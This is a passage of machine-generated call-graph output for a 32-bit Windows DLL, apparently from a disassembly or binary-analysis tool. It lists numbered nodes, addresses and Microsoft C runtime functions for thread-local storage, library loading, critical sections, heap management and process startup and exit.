10719->10720 10720->10718 10720->10720 10726 6cef24cd 10721->10726 10724 6cef263d InitializeCriticalSectionAndSpinCount 10725 6cef2628 10724->10725 10725->10704 10727 6cef24e5 10726->10727 10728 6cef2508 10726->10728 10727->10728 10732 6cef2433 10727->10732 10728->10724 10728->10725 10731 6cef24fa GetProcAddress 10731->10728 10737 6cef243f ___vcrt_FlsGetValue 10732->10737 10733 6cef2455 LoadLibraryExW 10734 6cef24ba 10733->10734 10735 6cef2473 GetLastError 10733->10735 10736 6cef24b3 10734->10736 10738 6cef24c2 FreeLibrary 10734->10738 10735->10737 10736->10728 10736->10731 10737->10733 10737->10736 10739 6cef2495 LoadLibraryExW 10737->10739 10738->10736 10739->10734 10739->10737 10741 6cef24cd ___vcrt_FlsGetValue 5 API calls 10740->10741 10742 6cef2530 10741->10742 10743 6cef2549 TlsAlloc 10742->10743 10744 6cef2353 10742->10744 10744->10712 10745 6cef25c7 10744->10745 10746 6cef24cd ___vcrt_FlsGetValue 5 API calls 10745->10746 10747 6cef25e1 10746->10747 10748 6cef25fc TlsSetValue 10747->10748 10749 6cef236c 10747->10749 10748->10749 10749->10715 10750 6cef237c 10749->10750 10751 6cef2386 10750->10751 10752 6cef238c 10750->10752 10754 6cef2551 10751->10754 10752->10712 10755 6cef24cd ___vcrt_FlsGetValue 5 API calls 10754->10755 10756 6cef256b 10755->10756 10757 6cef2583 TlsFree 10756->10757 10758 6cef2577 10756->10758 10757->10758 10758->10752 10760 6cef5a6d 10759->10760 10761 6cef1162 10759->10761 10760->10761 10763 6cef591d 10760->10763 10761->10670 10761->10697 10764 6cef5924 10763->10764 10765 6cef5967 GetStdHandle 10764->10765 10766 6cef59cd 10764->10766 10767 6cef597a GetFileType 10764->10767 10765->10764 10766->10760 10767->10764 10769 6cef1184 10768->10769 10770 6cef1180 10768->10770 10771 6cef12da __DllMainCRTStartup@12 4 API calls 10769->10771 10773 6cef1191 ___scrt_release_startup_lock 10769->10773 10770->10674 10772 6cef11fa 10771->10772 10773->10674 10780 6cef391b 10774->10780 10777 6cef1f8b 11058 6cef2273 10777->11058 10781 6cef3925 10780->10781 10784 6cef10cf 10780->10784 10788 6cef5691 10781->10788 10784->10777 10804 6cef5531 10788->10804 10790 6cef56ad 10791 6cef56c8 TlsGetValue 10790->10791 10792 6cef392c 10790->10792 10792->10784 10793 6cef56d0 10792->10793 10794 6cef5531 _free 5 API calls 10793->10794 10795 6cef56ec 10794->10795 10796 6cef570a TlsSetValue 10795->10796 10797 6cef393f 10795->10797 10798 6cef37e2 10797->10798 10799 6cef37fd 10798->10799 10800 6cef37ed 10798->10800 10799->10784 10817 6cef3803 10800->10817 10805 6cef555f 10804->10805 10809 6cef555b _free 10804->10809 10805->10809 10810 6cef546a 10805->10810 10808 6cef5579 GetProcAddress 10808->10809 10809->10790 10815 6cef547b ___vcrt_FlsGetValue 10810->10815 10811 6cef5526 10811->10808 10811->10809 10812 6cef5499 LoadLibraryExW 10813 6cef54b4 GetLastError 10812->10813 10812->10815 10813->10815 10814 6cef550f FreeLibrary 10814->10815 10815->10811 10815->10812 10815->10814 10816 6cef54e7 LoadLibraryExW 10815->10816 10816->10815 10818 6cef3818 10817->10818 10822 6cef381e 10817->10822 10820 6cef3f43 _free 14 API calls 10818->10820 10819 6cef3f43 _free 14 API calls 10821 6cef382a 10819->10821 10820->10822 10823 6cef3f43 _free 14 API calls 10821->10823 10822->10819 10824 6cef3835 10823->10824 10825 6cef3f43 _free 14 API calls 10824->10825 10826 6cef3840 10825->10826 10827 6cef3f43 _free 14 API calls 10826->10827 10828 6cef384b 10827->10828 10829 6cef3f43 _free 14 API calls 10828->10829 10830 6cef3856 10829->10830 10831 6cef3f43 _free 14 API calls 10830->10831 10832 6cef3861 10831->10832 10833 6cef3f43 _free 14 API calls 10832->10833 10834 6cef386c 10833->10834 10835 6cef3f43 _free 14 API calls 10834->10835 10836 6cef3877 10835->10836 10837 6cef3f43 _free 14 API calls 10836->10837 10838 6cef3885 10837->10838 10849 6cef362f 10838->10849 10843 6cef3f43 10844 6cef3f4e HeapFree 10843->10844 10845 6cef3f77 _free 10843->10845 10844->10845 10846 6cef3f63 10844->10846 10845->10799 10989 6cef3ed3 10846->10989 10850 6cef363b ___scrt_is_nonwritable_in_current_image 10849->10850 10865 6cef3bda EnterCriticalSection 10850->10865 10852 6cef366f 10866 6cef368e 10852->10866 10854 6cef3645 10854->10852 10856 6cef3f43 _free 14 API calls 10854->10856 10856->10852 10857 6cef369a 10858 6cef36a6 ___scrt_is_nonwritable_in_current_image 10857->10858 10870 6cef3bda EnterCriticalSection 10858->10870 10860 6cef36b0 10871 6cef38d0 10860->10871 10862 6cef36c3 10875 6cef36e3 10862->10875 10865->10854 10869 6cef3c22 LeaveCriticalSection 10866->10869 10868 6cef367c 10868->10857 10869->10868 10870->10860 10872 6cef3906 __fassign 10871->10872 10873 6cef38df __fassign 10871->10873 10872->10862 10873->10872 10878 6cef6628 10873->10878 10988 6cef3c22 LeaveCriticalSection 10875->10988 10877 6cef36d1 10877->10843 10879 6cef66a8 10878->10879 10882 6cef663e 10878->10882 10880 6cef66f6 10879->10880 10883 6cef3f43 _free 14 API calls 10879->10883 10946 6cef6799 10880->10946 10882->10879 10884 6cef6671 10882->10884 10889 6cef3f43 _free 14 API calls 10882->10889 10885 6cef66ca 10883->10885 10886 6cef6693 10884->10886 10894 6cef3f43 _free 14 API calls 10884->10894 10887 6cef3f43 _free 14 API calls 10885->10887 10888 6cef3f43 _free 14 API calls 10886->10888 10890 6cef66dd 10887->10890 10891 6cef669d 10888->10891 10893 6cef6666 10889->10893 10895 6cef3f43 _free 14 API calls 10890->10895 10896 6cef3f43 _free 14 API calls 10891->10896 10892 6cef6764 10897 6cef3f43 _free 14 API calls 10892->10897 10906 6cef8557 10893->10906 10899 6cef6688 10894->10899 10900 6cef66eb 10895->10900 10896->10879 10901 6cef676a 10897->10901 10934 6cef8655 10899->10934 10904 6cef3f43 _free 14 API calls 10900->10904 10901->10872 10902 6cef6704 10902->10892 10905 6cef3f43 14 API calls _free 10902->10905 10904->10880 10905->10902 10907 6cef8568 10906->10907 10933 6cef8651 10906->10933 10908 6cef3f43 _free 14 API calls 10907->10908 10909 6cef8579 10907->10909 10908->10909 10910 6cef3f43 _free 14 API calls 10909->10910 10912 6cef858b 10909->10912 10910->10912 10911 6cef859d 10913 6cef85af 10911->10913 10915 6cef3f43 _free 14 API calls 10911->10915 10912->10911 10914 6cef3f43 _free 14 API calls 10912->10914 10916 6cef85c1 10913->10916 10917 6cef3f43 _free 14 API calls 10913->10917 10914->10911 10915->10913 10918 6cef85d3 10916->10918 10919 6cef3f43 _free 14 API calls 10916->10919 10917->10916 10920 6cef85e5 10918->10920 10922 6cef3f43 _free 14 API calls 10918->10922 10919->10918 10921 6cef85f7 10920->10921 10923 6cef3f43 _free 14 API calls 10920->10923 10924 6cef8609 10921->10924 10925 6cef3f43 _free 14 API calls 10921->10925 10922->10920 10923->10921 10926 6cef861b 10924->10926 10927 6cef3f43 _free 14 API calls 10924->10927 10925->10924 10928 6cef862d 10926->10928 10930 6cef3f43 _free 14 API calls 10926->10930 10927->10926 10929 6cef863f 10928->10929 10931 6cef3f43 _free 14 API calls 10928->10931 10932 6cef3f43 _free 14 API calls 10929->10932 10929->10933 10930->10928 10931->10929 10932->10933 10933->10884 10935 6cef8662 10934->10935 10945 6cef86ba 10934->10945 10936 6cef3f43 _free 14 API calls 10935->10936 10937 6cef8672 10935->10937 10936->10937 10938 6cef8684 10937->10938 10939 6cef3f43 _free 14 API calls 10937->10939 10940 6cef8696 10938->10940 10942 6cef3f43 _free 14 API calls 10938->10942 10939->10938 10941 6cef86a8 10940->10941 10943 6cef3f43 _free 14 API calls 10940->10943 10944 6cef3f43 _free 14 API calls 10941->10944 10941->10945 10942->10940 10943->10941 10944->10945 10945->10886 10947 6cef67c5 10946->10947 10948 6cef67a6 10946->10948 10947->10902 10948->10947 10952 6cef86f6 10948->10952 10951 6cef3f43 _free 14 API calls 10951->10947 10953 6cef67bf 10952->10953 10954 6cef8707 10952->10954 10953->10951 10955 6cef86be __fassign 14 API calls 10954->10955 10956 6cef870f 10955->10956 10957 6cef86be __fassign 14 API calls 10956->10957 10958 6cef871a 10957->10958 10959 6cef86be __fassign 14 API calls 10958->10959 10960 6cef8725 10959->10960 10961 6cef86be __fassign 14 API calls 10960->10961 10962 6cef8730 10961->10962 10963 6cef86be __fassign 14 API calls 10962->10963 10964 6cef873e 10963->10964 10965 6cef3f43 _free 14 API calls 10964->10965 10966 6cef8749 10965->10966 10967 6cef3f43 _free 14 API calls 10966->10967 10968 6cef8754 10967->10968 10969 6cef3f43 _free 14 API calls 10968->10969 10970 6cef875f 10969->10970 10971 6cef86be __fassign 14 API calls 10970->10971 10972 6cef876d 10971->10972 10973 6cef86be __fassign 14 API calls 10972->10973 10974 6cef877b 10973->10974 10975 6cef86be __fassign 14 API calls 10974->10975 10976 6cef878c 10975->10976 10977 6cef86be __fassign 14 API calls 10976->10977 10978 6cef879a 10977->10978 10979 6cef86be __fassign 14 API calls 10978->10979 10980 6cef87a8 10979->10980 10981 6cef3f43 _free 14 API calls 10980->10981 10982 6cef87b3 10981->10982 10983 6cef3f43 _free 14 API calls 10982->10983 10984 6cef87be 10983->10984 10985 6cef3f43 _free 14 API calls 10984->10985 10986 6cef87c9 10985->10986 10987 6cef3f43 _free 14 API calls 10986->10987 10987->10953 10988->10877 10992 6cef3a9e GetLastError 10989->10992 10991 6cef3ed8 GetLastError 10991->10845 10993 6cef3ab5 10992->10993 10994 6cef3abb 10992->10994 10995 6cef5691 _free 6 API calls 10993->10995 10996 6cef56d0 _free 6 API calls 10994->10996 11013 6cef3ac1 SetLastError 10994->11013 10995->10994 10997 6cef3ad9 10996->10997 10997->11013 11015 6cef3ee6 10997->11015 11001 6cef3b08 11004 6cef56d0 _free 6 API calls 11001->11004 11002 6cef3af1 11003 6cef56d0 _free 6 API calls 11002->11003 11005 6cef3aff 11003->11005 11006 6cef3b14 11004->11006 11010 6cef3f43 _free 12 API calls 11005->11010 11007 6cef3b29 11006->11007 11008 6cef3b18 11006->11008 11022 6cef3749 11007->11022 11011 6cef56d0 _free 6 API calls 11008->11011 11010->11013 11011->11005 11013->10991 11014 6cef3f43 _free 12 API calls 11014->11013 11016 6cef3ef3 _free 11015->11016 11017 6cef3f33 11016->11017 11018 6cef3f1e RtlAllocateHeap 11016->11018 11027 6cef5b05 11016->11027 11020 6cef3ed3 _free 13 API calls 11017->11020 11018->11016 11019 6cef3ae9 11018->11019 11019->11001 11019->11002 11020->11019 11036 6cef35dd 11022->11036 11030 6cef5b32 11027->11030 11031 6cef5b3e ___scrt_is_nonwritable_in_current_image 11030->11031 11032 6cef3bda _free EnterCriticalSection 11031->11032 11033 6cef5b49 11032->11033 11034 6cef5b85 _free LeaveCriticalSection 11033->11034 11035 6cef5b10 11034->11035 11035->11016 11037 6cef35e9 ___scrt_is_nonwritable_in_current_image 11036->11037 11050 6cef3bda EnterCriticalSection 11037->11050 11039 6cef35f3 11051 6cef3623 11039->11051 11042 6cef36ef 11043 6cef36fb ___scrt_is_nonwritable_in_current_image 11042->11043 11054 6cef3bda EnterCriticalSection 11043->11054 11045 6cef3705 11046 6cef38d0 _free 14 API calls 11045->11046 11047 6cef371d 11046->11047 11055 6cef373d 11047->11055 11050->11039 11052 6cef3c22 _free LeaveCriticalSection 11051->11052 11053 6cef3611 11052->11053 11053->11042 11054->11045 11056 6cef3c22 _free LeaveCriticalSection 11055->11056 11057 6cef372b 11056->11057 11057->11014 11059 6cef2280 11058->11059 11065 6cef10d4 11058->11065 11060 6cef228e 11059->11060 11066 6cef258c 11059->11066 11062 6cef25c7 ___vcrt_FlsSetValue 6 API calls 11060->11062 11063 6cef229e 11062->11063 11071 6cef2257 11063->11071 11065->10606 11067 6cef24cd ___vcrt_FlsGetValue 5 API calls 11066->11067 11068 6cef25a6 11067->11068 11069 6cef25be TlsGetValue 11068->11069 11070 6cef25b2 11068->11070 11069->11070 11070->11060 11072 6cef2261 11071->11072 11074 6cef226e 11071->11074 11072->11074 11075 6cef33b4 11072->11075 11074->11065 11076 6cef3f43 _free 14 API calls 11075->11076 11077 6cef33cc 11076->11077 11077->11074 11084 6cef22b7 11078->11084 11080 6cef10b0 11080->10633 11081 6cef3323 11080->11081 11082 6cef3a9e _free 14 API calls 11081->11082 11083 6cef10bc 11082->11083 11083->10631 11083->10632 11085 6cef22c3 GetLastError 11084->11085 11086 6cef22c0 11084->11086 11087 6cef258c ___vcrt_FlsGetValue 6 API calls 11085->11087 11086->11080 11088 6cef22d8 11087->11088 11089 6cef233d SetLastError 11088->11089 11090 6cef25c7 ___vcrt_FlsSetValue 6 API calls 11088->11090 11097 6cef22f7 11088->11097 11089->11080 11092 6cef22f1 11090->11092 11091 6cef2319 11094 6cef25c7 ___vcrt_FlsSetValue 6 API calls 11091->11094 11095 6cef232d 11091->11095 11092->11091 11093 6cef25c7 ___vcrt_FlsSetValue 6 API calls 11092->11093 11092->11097 11093->11091 11094->11095 11096 6cef33b4 ___std_type_info_destroy_list 14 API calls 11095->11096 11096->11097 11097->11089 11099 6cef1110 ___scrt_release_startup_lock 11098->11099 11100 6cef1114 11099->11100 11102 6cef1120 __DllMainCRTStartup@12 11099->11102 11123 6cef319e 11100->11123 11104 6cef112d 11102->11104 11126 6cef2a01 11102->11126 11104->10640 11193 6cef1f3e InterlockedFlushSList 11107->11193 11111 6cef12b8 11110->11111 11112 6cef0c5e 11111->11112 11197 6cef3336 11111->11197 11116 6cef0c9a 11112->11116 11114 6cef12c6 11115 6cef1f96 ___scrt_uninitialize_crt 7 API calls 11114->11115 11115->11112 11310 6cef112e 11116->11310 11120 6cef02b4 11119->11120 11327 6cef0a90 11120->11327 11122 6cef0a26 11122->10654 11122->10656 11137 6cef3069 11123->11137 11127 6cef2a0f 11126->11127 11136 6cef2a20 11126->11136 11154 6cef2aa7 GetModuleHandleW 11127->11154 11131 6cef2a5a 11131->10640 11161 6cef28c7 11136->11161 11138 6cef3075 ___scrt_is_nonwritable_in_current_image 11137->11138 11145 6cef3bda EnterCriticalSection 11138->11145 11140 6cef3083 11146 6cef30c4 11140->11146 11145->11140 11147 6cef30e3 11146->11147 11148 6cef3090 11146->11148 11147->11148 11149 6cef3f43 _free 14 API calls 11147->11149 11150 6cef30b8 11148->11150 11149->11148 11153 6cef3c22 LeaveCriticalSection 11150->11153 11152 6cef111e 11152->10640 11153->11152 11155 6cef2a14 11154->11155 11155->11136 11156 6cef2aea GetModuleHandleExW 11155->11156 11157 6cef2b1e 11156->11157 11158 6cef2b09 GetProcAddress 11156->11158 11159 6cef2b3b 11157->11159 11160 6cef2b32 FreeLibrary 11157->11160 11158->11157 11159->11136 11160->11159 11162 6cef28d3 ___scrt_is_nonwritable_in_current_image 11161->11162 11177 6cef3bda EnterCriticalSection 11162->11177 11164 6cef28dd 11178 6cef2914 11164->11178 11166 6cef28ea 11182 6cef2908 11166->11182 11169 6cef2a65 11186 6cef3c39 GetPEB 11169->11186 11172 6cef2a94 11175 6cef2aea __DllMainCRTStartup@12 3 API calls 11172->11175 11173 6cef2a74 GetPEB 11173->11172 11174 6cef2a84 GetCurrentProcess TerminateProcess 11173->11174 11174->11172 11176 6cef2a9c ExitProcess 11175->11176 11177->11164 11179 6cef2920 ___scrt_is_nonwritable_in_current_image 11178->11179 11180 6cef2981 __DllMainCRTStartup@12 11179->11180 11181 6cef319e __DllMainCRTStartup@12 14 API calls 11179->11181 11180->11166 11181->11180 11185 6cef3c22 LeaveCriticalSection 11182->11185 11184 6cef28f6 11184->11131 11184->11169 11185->11184 11187 6cef3c53 11186->11187 11188 6cef2a6f 11186->11188 11190 6cef55b4 11187->11190 11188->11172 11188->11173 11191 6cef5531 _free 5 API calls 11190->11191 11192 6cef55d0 11191->11192 11192->11188 11194 6cef0fd1 11193->11194 11195 6cef1f4e 11193->11195 11194->10645 11195->11194 11196 6cef33b4 ___std_type_info_destroy_list 14 API calls 11195->11196 11196->11195 11198 6cef3353 ___scrt_uninitialize_crt 11197->11198 11199 6cef3341 11197->11199 11198->11114 11200 6cef334f 11199->11200 11202 6cef6177 11199->11202 11200->11114 11205 6cef6025 11202->11205 11208 6cef5f79 11205->11208 11209 6cef5f85 ___scrt_is_nonwritable_in_current_image 11208->11209 11216 6cef3bda EnterCriticalSection 11209->11216 11211 6cef5f8f ___scrt_uninitialize_crt 11212 6cef5ffb 11211->11212 11217 6cef5eed 11211->11217 11225 6cef6019 11212->11225 11216->11211 11218 6cef5ef9 ___scrt_is_nonwritable_in_current_image 11217->11218 11228 6cef6294 EnterCriticalSection 11218->11228 11220 6cef5f03 ___scrt_uninitialize_crt 11221 6cef5f3c 11220->11221 11229 6cef612f 11220->11229 11239 6cef5f6d 11221->11239 11309 6cef3c22 LeaveCriticalSection 11225->11309 11227 6cef6007 11227->11200 11228->11220 11230 6cef613c 11229->11230 11231 6cef6145 11229->11231 11232 6cef6025 ___scrt_uninitialize_crt 66 API calls 11230->11232 11242 6cef60ca 11231->11242 11238 6cef6142 11232->11238 11236 6cef6161 11255 6cef7792 11236->11255 11238->11221 11308 6cef62a8 LeaveCriticalSection 11239->11308 11241 6cef5f5b 11241->11211 11243 6cef60e2 11242->11243 11247 6cef6107 11242->11247 11244 6cef64c0 ___scrt_uninitialize_crt 25 API calls 11243->11244 11243->11247 11245 6cef6100 11244->11245 11266 6cef7f8a 11245->11266 11247->11238 11248 6cef64c0 11247->11248 11249 6cef64cc 11248->11249 11250 6cef64e1 11248->11250 11251 6cef3ed3 _free 14 API calls 11249->11251 11250->11236 11252 6cef64d1 11251->11252 11291 6cef3e16 11252->11291 11256 6cef77a3 11255->11256 11259 6cef77b0 11255->11259 11257 6cef3ed3 _free 14 API calls 11256->11257 11265 6cef77a8 11257->11265 11258 6cef77f9 11260 6cef3ed3 _free 14 API calls 11258->11260 11259->11258 11261 6cef77d7 11259->11261 11262 6cef77fe 11260->11262 11294 6cef76f0 11261->11294 11264 6cef3e16 __fassign 25 API calls 11262->11264 11264->11265 11265->11238 11267 6cef7f96 ___scrt_is_nonwritable_in_current_image 11266->11267 11268 6cef7f9e 11267->11268 11269 6cef7fb6 11267->11269 11270 6cef3ec0 __dosmaperr 14 API calls 11268->11270 11271 6cef8051 11269->11271 11275 6cef7fe8 11269->11275 11272 6cef7fa3 11270->11272 11273 6cef3ec0 __dosmaperr 14 API calls 11271->11273 11274 6cef3ed3 _free 14 API calls 11272->11274 11276 6cef8056 11273->11276 11290 6cef7fab 11274->11290 11277 6cef75af ___scrt_uninitialize_crt EnterCriticalSection 11275->11277 11278 6cef3ed3 _free 14 API calls 11276->11278 11279 6cef7fee 11277->11279 11280 6cef805e 11278->11280 11281 6cef801f 11279->11281 11282 6cef800a 11279->11282 11283 6cef3e16 __fassign 25 API calls 11280->11283 11285 6cef807c ___scrt_uninitialize_crt 60 API calls 11281->11285 11284 6cef3ed3 _free 14 API calls 11282->11284 11283->11290 11286 6cef800f 11284->11286 11287 6cef801a 11285->11287 11288 6cef3ec0 __dosmaperr 14 API calls 11286->11288 11289 6cef8049 ___scrt_uninitialize_crt LeaveCriticalSection 11287->11289 11288->11287 11289->11290 11290->11247 11292 6cef3db2 __fassign 25 API calls 11291->11292 11293 6cef3e22 11292->11293 11293->11236 11295 6cef76fc ___scrt_is_nonwritable_in_current_image 11294->11295 11296 6cef75af ___scrt_uninitialize_crt EnterCriticalSection 11295->11296 11297 6cef770b 11296->11297 11298 6cef7752 11297->11298 11300 6cef7686 ___scrt_uninitialize_crt 25 API calls 11297->11300 11299 6cef3ed3 _free 14 API calls 11298->11299 11303 6cef7757 11299->11303 11301 6cef7737 FlushFileBuffers 11300->11301 11302 6cef7743 11301->11302 11301->11303 11304 6cef3ec0 __dosmaperr 14 API calls 11302->11304 11305 6cef7786 ___scrt_uninitialize_crt LeaveCriticalSection 11303->11305 11306 6cef7748 GetLastError 11304->11306 11307 6cef776f 11305->11307 11306->11298 11307->11265 11308->11241 11309->11227 11315 6cef3366 11310->11315 11313 6cef237c ___vcrt_uninitialize_ptd 6 API calls 11314 6cef0c9f 11313->11314 11314->10653 11318 6cef3b7f 11315->11318 11319 6cef3b89 11318->11319 11320 6cef1135 11318->11320 11322 6cef5652 11319->11322 11320->11313 11323 6cef5531 _free 5 API calls 11322->11323 11324 6cef566e 11323->11324 11325 6cef5689 TlsFree 11324->11325 11326 6cef5677 11324->11326 11326->11320 11328 6cef0a99 IsProcessorFeaturePresent 11327->11328 11329 6cef0a98 11327->11329 11331 6cef0e3e 11328->11331 11329->11122 11334 6cef0e01 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11331->11334 11333 6cef0f21 11333->11122 11334->11333 11335 6cef0dde 11336 6cef0dec 11335->11336 11337 6cef0de7 11335->11337 11341 6cef0ca8 11336->11341 11356 6cef0f70 11337->11356 11342 6cef0cb4 ___scrt_is_nonwritable_in_current_image 11341->11342 11343 6cef0cdd dllmain_raw 11342->11343 11344 6cef0cc3 11342->11344 11345 6cef0cd8 11342->11345 11343->11344 11346 6cef0cf7 dllmain_crt_dispatch 11343->11346 11347 6cef0250 __DllMainCRTStartup@12 5 API calls 11345->11347 11346->11344 11346->11345 11348 6cef0d18 11347->11348 11349 6cef0d49 11348->11349 11351 6cef0250 __DllMainCRTStartup@12 5 API calls 11348->11351 11349->11344 11350 6cef0d52 dllmain_crt_dispatch 11349->11350 11350->11344 11352 6cef0d65 dllmain_raw 11350->11352 11353 6cef0d30 11351->11353 11352->11344 11354 6cef0bf8 __DllMainCRTStartup@12 84 API calls 11353->11354 11355 6cef0d3e dllmain_raw 11354->11355 11355->11349 11357 6cef0f86 11356->11357 11359 6cef0f8f 11357->11359 11360 6cef0f23 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11357->11360 11359->11336 11360->11359 12088 6cef585e GetStartupInfoW 12089 6cef5918 12088->12089 12090 6cef5884 12088->12090 12090->12089 12094 6cef7511 12090->12094 12092 6cef58ac 12092->12089 12093 6cef58dc GetFileType 12092->12093 12093->12092 12095 6cef751d ___scrt_is_nonwritable_in_current_image 12094->12095 12096 6cef7547 12095->12096 12097 6cef7526 12095->12097 12107 6cef3bda EnterCriticalSection 12096->12107 12098 6cef3ed3 _free 14 API calls 12097->12098 12100 6cef752b 12098->12100 12101 6cef3e16 __fassign 25 API calls 12100->12101 12103 6cef7535 12101->12103 12103->12092 12105 6cef757f 12115 6cef75a6 12105->12115 12106 6cef7553 12106->12105 12108 6cef7461 12106->12108 12107->12106 12109 6cef3ee6 _free 14 API calls 12108->12109 12111 6cef7473 12109->12111 12110 6cef7480 12112 6cef3f43 _free 14 API calls 12110->12112 12111->12110 12113 6cef5712 6 API calls 12111->12113 12114 6cef74d5 12112->12114 12113->12111 12114->12106 12118 6cef3c22 LeaveCriticalSection 12115->12118 12117 6cef75ad 12117->12103 12118->12117 12148 6cef321e 12151 6cef302d 12148->12151 12152 6cef303c 12151->12152 12153 6cef2f9f 14 API calls 12152->12153 12154 6cef3056 12153->12154 12155 6cef2f9f 14 API calls 12154->12155 12156 6cef3061 12155->12156 12119 6cef325d 12122 6cef32e3 12119->12122 12123 6cef3270 12122->12123 12124 6cef32f7 12122->12124 12124->12123 12125 6cef3f43 _free 14 API calls 12124->12125 12125->12123 12549 6cef471d 12550 6cef472f 12549->12550 12551 6cef472b 12549->12551 12552 6cef475a 12550->12552 12553 6cef4734 12550->12553 12552->12551 12560 6cef53af 12552->12560 12554 6cef3ee6 _free 14 API calls 12553->12554 12556 6cef473d 12554->12556 12558 6cef3f43 _free 14 API calls 12556->12558 12557 6cef477a 12559 6cef3f43 _free 14 API calls 12557->12559 12558->12551 12559->12551 12561 6cef53bc 12560->12561 12562 6cef53d7 12560->12562 12561->12562 12563 6cef53c8 12561->12563 12564 6cef53e6 12562->12564 12569 6cef7349 12562->12569 12565 6cef3ed3 _free 14 API calls 12563->12565 12576 6cef737c 12564->12576 12568 6cef53cd __DllMainCRTStartup@12 12565->12568 12568->12557 12570 6cef7369 HeapSize 12569->12570 12571 6cef7354 12569->12571 12570->12564 12572 6cef3ed3 _free 14 API calls 12571->12572 12573 6cef7359 12572->12573 12574 6cef3e16 __fassign 25 API calls 12573->12574 12575 6cef7364 12574->12575 12575->12564 12577 6cef7389 12576->12577 12578 6cef7394 12576->12578 12579 6cef62bc 15 API calls 12577->12579 12580 6cef739c 12578->12580 12586 6cef73a5 _free 12578->12586 12585 6cef7391 12579->12585 12583 6cef3f43 _free 14 API calls 12580->12583 12581 6cef73cf HeapReAlloc 12581->12585 12581->12586 12582 6cef73aa 12584 6cef3ed3 _free 14 API calls 12582->12584 12583->12585 12584->12585 12585->12568 12586->12581 12586->12582 12587 6cef5b05 _free 2 API calls 12586->12587 12587->12586 12268 6cef3b99 12269 6cef3ba4 12268->12269 12270 6cef5712 6 API calls 12269->12270 12271 6cef3bcd 12269->12271 12272 6cef3bc9 12269->12272 12270->12269 12274 6cef3bf1 12271->12274 12275 6cef3c1d 12274->12275 12276 6cef3bfe 12274->12276 12275->12272 12277 6cef3c08 DeleteCriticalSection 12276->12277 12277->12275 12277->12277 11444 6cef10d7 11445 6cef10df ___scrt_release_startup_lock 11444->11445 11448 6cef274f 11445->11448 11447 6cef1107 11449 6cef275e 11448->11449 11450 6cef2762 11448->11450 11449->11447 11453 6cef276f 11450->11453 11454 6cef3a9e _free 14 API calls 11453->11454 11455 6cef276b 11454->11455 11455->11447 12236 6cef9bd7 12237 6cef9bf0 __startOneArgErrorHandling 12236->12237 12238 6cefa015 20 API calls 12237->12238 12239 6cef9c19 __startOneArgErrorHandling 12237->12239 12238->12239 12157 6cef5816 12158 6cef5821 12157->12158 12160 6cef5847 12157->12160 12159 6cef5831 FreeLibrary 12158->12159 12158->12160 12159->12158 11456 6cef98d5 11460 6cef98fd 11456->11460 11457 6cef9935 11458 6cef992e 11469 6cef9990 11458->11469 11459 6cef9927 11465 6cef99a7 11459->11465 11460->11457 11460->11458 11460->11459 11466 6cef99b0 11465->11466 11473 6cef9ec3 11466->11473 11470 6cef99b0 11469->11470 11471 6cef9ec3 __startOneArgErrorHandling 20 API calls 11470->11471 11472 6cef9933 11471->11472 11474 6cef9f02 __startOneArgErrorHandling 11473->11474 11478 6cef9f84 __startOneArgErrorHandling 11474->11478 11481 6cefa2ce 11474->11481 11477 6cef9fb9 11479 6cef0a90 _ValidateLocalCookies 5 API calls 11477->11479 11478->11477 11484 6cefa5e7 11478->11484 11480 6cef992c 11479->11480 11491 6cefa2f1 11481->11491 11485 6cefa609 11484->11485 11486 6cefa5f4 11484->11486 11488 6cef3ed3 _free 14 API calls 11485->11488 11487 6cefa60e 11486->11487 11489 6cef3ed3 _free 14 API calls 11486->11489 11487->11477 11488->11487 11490 6cefa601 11489->11490 11490->11477 11492 6cefa31c __raise_exc 11491->11492 11493 6cefa515 RaiseException 11492->11493 11494 6cefa2ec 11493->11494 11494->11478 12161 6cef2015 12164 6cef2063 12161->12164 12165 6cef2020 12164->12165 12166 6cef206c 12164->12166 12166->12165 12173 6cef22a9 12166->12173 12168 6cef20a7 12169 6cef22a9 47 API calls 12168->12169 12170 6cef20b2 12169->12170 12186 6cef3378 12170->12186 12174 6cef22b7 23 API calls 12173->12174 12175 6cef22ae 12174->12175 12175->12168 12176 6cef5c5c __fassign 2 API calls 12175->12176 12178 6cef342e 12176->12178 12177 6cef3439 12180 6cef3462 12177->12180 12181 6cef3443 IsProcessorFeaturePresent 12177->12181 12178->12177 12179 6cef5ca1 __fassign 37 API calls 12178->12179 12179->12177 12183 6cef2b5b __fassign 23 API calls 12180->12183 12182 6cef344f 12181->12182 12184 6cef3c6a __fassign 8 API calls 12182->12184 12185 6cef346c 12183->12185 12184->12180 12187 6cef3384 ___scrt_is_nonwritable_in_current_image 12186->12187 12188 6cef3947 __fassign 37 API calls 12187->12188 12191 6cef3389 12188->12191 12189 6cef3429 __fassign 37 API calls 12190 6cef33b3 12189->12190 12191->12189 12126 6cef3254 12127 6cef1f96 ___scrt_uninitialize_crt 7 API calls 12126->12127 12128 6cef325b 12127->12128 12404 6cef3b53 12412 6cef5613 12404->12412 12407 6cef3b67 12408 6cef3a9e _free 14 API calls 12409 6cef3b6f 12408->12409 12410 6cef3b7c 12409->12410 12411 6cef3b7f __DllMainCRTStartup@12 6 API calls 12409->12411 12411->12407 12413 6cef5531 _free 5 API calls 12412->12413 12414 6cef562f 12413->12414 12415 6cef5647 TlsAlloc 12414->12415 12416 6cef3b5d 12414->12416 12415->12416 12416->12407 12416->12408 11495 6cef8cd1 11496 6cef8cf5 11495->11496 11497 6cef8d0e 11496->11497 11500 6cef9bd7 __startOneArgErrorHandling 11496->11500 11498 6cef8d58 11497->11498 11503 6cef99e3 11497->11503 11502 6cef9c19 __startOneArgErrorHandling 11500->11502 11511 6cefa015 11500->11511 11504 6cef99f6 DecodePointer 11503->11504 11505 6cef9a06 11503->11505 11504->11505 11506 6cef9a4a 11505->11506 11507 6cef9a91 11505->11507 11508 6cef9a35 11505->11508 11506->11507 11509 6cef3ed3 _free 14 API calls 11506->11509 11507->11498 11508->11507 11510 6cef3ed3 _free 14 API calls 11508->11510 11509->11507 11510->11507 11512 6cefa04e __startOneArgErrorHandling 11511->11512 11513 6cefa2f1 __raise_exc RaiseException 11512->11513 11514 6cefa075 __startOneArgErrorHandling 11512->11514 11513->11514 11515 6cefa0b8 11514->11515 11516 6cefa093 11514->11516 11517 6cefa5e7 __startOneArgErrorHandling 14 API calls 11515->11517 11522 6cefa616 11516->11522 11519 6cefa0b3 